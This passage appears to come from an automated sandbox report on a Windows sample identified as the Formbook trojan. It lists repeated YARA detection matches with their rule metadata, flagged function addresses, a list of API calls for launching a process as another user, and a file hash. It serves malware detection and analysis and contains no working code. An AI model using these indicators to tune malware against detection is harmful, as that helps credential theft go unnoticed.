Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: kmhbvf.exe PID: 4820, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: kmhbvf.exe PID: 5280, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 2304, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00406333 0_2_00406333
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_00404936 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF33B7 1_2_00EF33B7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00ED9C80 1_2_00ED9C80
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF23F5 1_2_00EF23F5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F58400 1_2_00F58400
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F06502 1_2_00F06502
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EDE6F0 1_2_00EDE6F0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F0265E 1_2_00F0265E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF282A 1_2_00EF282A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F089BF 1_2_00F089BF
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F06A74 1_2_00F06A74
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F50A3A 1_2_00F50A3A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE0BE0 1_2_00EE0BE0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F2EDB2 1_2_00F2EDB2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFCD51 1_2_00EFCD51
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F50EB7 1_2_00F50EB7
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F38E44 1_2_00F38E44
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F06FE6 1_2_00F06FE6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EDB020 1_2_00EDB020
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00ED94E0 1_2_00ED94E0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EED45D 1_2_00EED45D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFF409 1_2_00EFF409
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EDF6A0 1_2_00EDF6A0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF16B4 1_2_00EF16B4
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00ED1663 1_2_00ED1663
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EEF628 1_2_00EEF628
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF78C3 1_2_00EF78C3
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF1BA8 1_2_00EF1BA8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFDBA5 1_2_00EFDBA5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F09CE5 1_2_00F09CE5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EEDD28 1_2_00EEDD28
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF1FC0 1_2_00EF1FC0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFBFD6 1_2_00EFBFD6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF0227 1_2_03AF0227
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_03AF04D8 1_2_03AF04D8
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041E81B 2_2_0041E81B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041DA1E 2_2_0041DA1E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00402D87 2_2_00402D87
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041D5A6 2_2_0041D5A6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00409E60 2_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041EF6B 2_2_0041EF6B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041DFC2 2_2_0041DFC2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_0041E798 2_2_0041E798
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EDB020 2_2_00EDB020
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EFDBA5 2_2_00EFDBA5
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00ED94E0 2_2_00ED94E0
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00ED9C80 2_2_00ED9C80
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EED45D 2_2_00EED45D
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00F58400 2_2_00F58400
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EFCD51 2_2_00EFCD51
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EEDD28 2_2_00EEDD28
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00F06502 2_2_00F06502
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EF16B4 2_2_00EF16B4
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00ED1663 2_2_00ED1663
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EEF628 2_2_00EEF628
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00F06FE6 2_2_00F06FE6
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EFBFD6 2_2_00EFBFD6
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F28F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 1_2_00F28F2E
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\kmhbvf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Uses 32bit PE files
Source: shedfam.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Yara signature match
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
